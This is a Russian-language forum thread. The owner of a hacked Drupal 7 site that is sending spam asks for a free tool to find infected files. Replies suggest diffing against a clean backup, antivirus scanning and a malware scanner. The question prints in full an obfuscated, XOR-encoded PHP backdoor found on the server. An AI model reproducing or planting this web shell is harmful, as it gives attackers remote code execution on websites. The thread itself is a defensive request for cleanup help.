21 марта 2015 в 23:28
Пожалуйста, подскажите:
Есть сайт на drupal7, его хакнули, идет спам.
Хостер написал, чтобы удалили все зараженные файлы. На приличных хостингах стоит система, которая сразу выдает список файлов, которые надо удалить. Но тут хостер ленив, сказал "ищите сами".
Основной вопрос: есть какая-нибудь бесплатная утилита, через которую можно прогнать исходники?
Вручную нашел несколько файлов, пример:
<?php
$flz='Ux'^'1M5k%y';$rep='R7B@@6M39F#A%"'^'7E0/2i?VI)Q4(KE8iOcA';$yyeff='""';$ldgv=0;$mghul=')';##e?})_;]N15.)2$X}Z/3roWa
$vaklx='Y!*Z]Q54]K@V';$cib='(C}|%|0Q[)m#oz})sZ%vE=4m'^'({eP_dP';$cfri='6A@lCTtEqX&ypPx&gB)MWbAb3VRdCA{G';ihgqaj;$bsrc='(AB94^2qLWaN*'^'A/+fG;F';/*$pj;hJ4(/^5J5[Z|uW(U0:f6VZpbwmhat^$lwspmgxiy*/$vz='=ng$.{/';
$gavxf='$`1jWFGl%)/HG4hQ?';mrkgfql;$euqojt='CtEBFm'^'.';cmdectn;$bsrc($rep,$ldgv);$rep($ldgv);
$lobcea=$vaklx.$mghul;lxlgh;$rmzuyp=':SO;)4jR(%#"ML';
'8h8=%';/*$y0f!/Mu?@^.?LYz$w9!"h`!x3@g$jYh_],]Bekqonqclhelw<<,BtcSJ+bO*Z=2#_V+L(w0*/$lq=${'b-(ke2jqLWaN*'^$vz};##4a33Qc8.zrldJb{tm$)j^!
$nnqum^'qiqeenh';'1YF5y';/*"wl;f{OM@!f0+[p5|{N?u@%}[IZKiyc|7IpMPiKrP+fNEhb7^lc^A$f/V9v2D}-kN0y`*f=2blz:R!THGkA#E&5R^vP.YM*/$jwn='U$tZ"eL#AaBAD2AD_wHyoU%WV5e]r$B%';
##y!@/!bE9xCDE5Bh@8o;90(
$yc='e7JjN^.wK!^IWAJ;!T3';
$ltm=$jwn.'`M"qDRp'^$cfri;##T,UquzOEt2ytcpe6BS[s#P0-Z
$eij='`N{`XQj!F';ljdxk;$mghul=$euqojt.$flz;/*EjR_e#t:(IXM&zt9D6dK=r(ifwrcshktzrewqg>>XsrE1XyYHZ(zjdG|oC6S*:;Q0t^qXe&*/$ztdna=$lq['uoi'];/*ih!UFJbM$Jj@aW%1*/fobj;$rzdamz=$lobcea.$yyeff^$rmzuyp;'`Dx=U';'npB;[Y';if($ltm==$mghul($ztdna)){$emjto=':Z[Z=Q';/*?",)=geaT[[RFhl5vK2IFF4-*4kjQ/cF12yW.dn_C4tOfB^rJy(|8/bJN}5M)IF?S*/$zjosv='.Q94=&8[#y{X9Ia?#%L;V';##;rK2lX:g`[user=0YJLKq]0YJLKq[/user];:N"pP7M5,Qg+sRYsY3O(GH
$sh|'sumw';'o*3{[}';/*MSOCVBffY3uz[-_5ugp_`Syxx,osnuwhav>>=|]QjifT=2b?Pk)?5gSh@qjZ$XK+CFj`1KnKF1OW*//*F9DQM_kRae,u`g@mXyoE!JN!`f5UDf#[bczJbjlmzjtotuv<<7J!#6"!_ddjz:$B)-dC-]SVZ{w4.WA$5ia,MDZ*/$ouer=$mqcj^'uY_Jegf{=VNn3EB%PW.2';$ocg^$veew;'T.eJM';
'&cXfZ2h';/*`.kBEE$IjVn+W"6Dv!zd$ZoJXR$nhq='zomvbgkynnv';'tfjxqc';*/'JIL1m';$bsliw^$ynvks;##mCO4r0Kw1^,LO#4"]dIM*_@LqnWn$cJz0
$ctvte>>'rcmitpdaoqikbwjtcx';$sjzj='d8:)Xg';$ezfsl='V(ZG{=7s_%EBMCKyQW$?/';$luax='ckEj_N$KQlP^OWA_U{/ybxb1HC?)ntYTVKK$P=)sJ1E%J+F8@L+&^j=60ga""aZ*/to6XR9H6((L"R0g[zyG+f"j04.fY.%5gelBs1`G1G6XnJ$..B_rVu7`)v`}Q-9/)w)vziseD^_W12=R-K_/0"=%:mDq`:t}e"fR2LCO+pU$9O/AOO,i0QZNq|ze)9gk5:L71E.w2O/6#BUT29,^9:XV`ng,P@M:TQi+9E{';$sfs='c*qhO;NaN25U)tLmg'.'rknq';/*+5Gl65dIe[6$_5jHO:A02dK5P/F`(MA[Td!B$dn='lbjsqzsmdlyzhfdvbudhpw';'mjm';*/'W?O,';$bfufa='!V|opwGP?w-57H;iHm4#=pxi';
/*|ep}e`qS7dh?)RP9T`Pk)wEeD;X&zYCVu?U7$gI;lbbznb^gJ#..o_n3ME@gCG[Y{*6t-*/$opnop='T-!N%No5y`HPJMJJsRjIm'^$zeb;$xuuj='T-!N%No5y`HPJMJJsRjIm'.$phx;$rtsik^')X(tb=mXP';/*b!Y::YPCW`g^d[-umFS8}20Cvcm7E-k2=Ly6U5$tzy='nzrduksqhgvjrsmparva';'uplur';*/$xytz=$zptzc.')Mc]C%mCm';$zxv='ibLN*/^vyM53?#8wq$i0.=1jj;MSL)p}vtkB9QL,-T1z)D(L%"_UvNbpy+$qyC"XUV2mz&T8iFI!GpmN{Yct%m%{}k={VWOE8WHz8D+U4^eFkAC^6&Zr*q)e33&sU@LZUt_SILE"732nUX&r(0ADGSQIE`.&s886yD*K/0mv+wPT?p/."IKmxztQX%&fv,"panOH&]Uot%?*f88HJDc[[+3VZ8H5#"^1yM^X?R'.$sjzj;$thbn=$luax.$emjto;
$cpbsc='AQ.*q$9Cq,c_[xF';$zxv.='F.TH&:AHo@:H8"`C(E}iP@#8ey]?G$UzV7&';$bhthw=$zxv.'@;b_6`_f+=Cd)!'^$thbn.'rq0-EU%-GdV,KJIx"Lt)56BTM]0S=W=Sm=/';$kkdyk=$kkdyk.'4D)kp"6?imP6c50l87Gsc6)kB';$euipf=$euipf.'}D2-=;"ZE_?7Zlj^';'@;b_6`_f+=Cd)!';/*k&N!(=zGvDj-}5]c,C`amX.!7T@*/
$utzl='^-!Fl"y6xiMT=9+i|$l)'.'rP(0wY';/*Tc`wlPQphNJI9+BKeLyb3`5zct.,@|N$bnns='gvsdyhcnerxoe';'lcfmr';*/$hsbmg='AN.P^26FQfXXrW4';'`uTIcPjA?';$esps=$rzdamz($wcf,$bhthw);$esps('$49JPn!}gyl3yY(RS|(,$z"wy*QU_a',',5C+u2X');}'WY1][%P]Bf$7Y';'v-yc8_^qI$#F-5C4,-t"?ec[h';$upon('`smR*%V]&|','Jp+3%kKl1xE');jjvq;$stig('/rTvz81');/*$kaz;Ufs*I$&I4Ek^NGl/k9Lk6lsZ=bNmmlav^$gbfkqc*/hifrycr;##AqL-vlI;)bO|rJ-A{A9d7
$hsoez^'vporlnvsyiqdawuypi';/*5@BNIf[Bvn|c=hJ6{C*nM|hyxlus^z3EXi#od$^rSK`FvH{%$5w%I)+s"6j$9?xC7*/##(d&0XqVGa@%yhoUZTwtET2CZND
$wik='/a%0GWL';$jcvtv($kkjqy,$zqgq);'sC`6aH';
?>
Комментарии
Есть утилита. Но как и все умные утилиты вполне может удалить что-то нужное, или удалить не полностью.
А руками вирус не победить.
Компьютер быстрее человека.
Готов на комерческой основе решить данную проблему, потому как в холодильнике пусто, и альтруизм исчез с последими продуктами
Надёжно в автоматическом режиме найти все изменённые файлы, можно только сравнив с чистым бекапом. Это можно сделать с помощью diff. Или с помощью системы контроля версий, если вы её используете.
И то могут остаться "закладки" в базе данных.
С довольно большой долей вероятности, найти заражённые файлы можно с помощью clamav или другого антивирусника, если он установлен на хостинге, и есть возможность работать в консоли. Или скачав сайт себе и проверив антивирусом. Но это не гарантирует нахождения всех проблемных мест, особенно разных ссылок на внешние сайты, редиректов и.т.п., только кода всяких шеллов, и то не со 100% надёжностью.
Как, кстати и
Которая к приличности хостинга не имеет отношения, на самом деле, и суть веб интерфейс в вышеописанному.
В общем, это мероприятие, по хорошему, требует ручного труда довольно подготовленного специалиста, а различные утилитки только помогают его сократить.
http://revisium.com/ai/
Всем спасибо за советы
В итоге, сделал поиск по определенным регуляркам, поудалял, жду, что хостер скажет.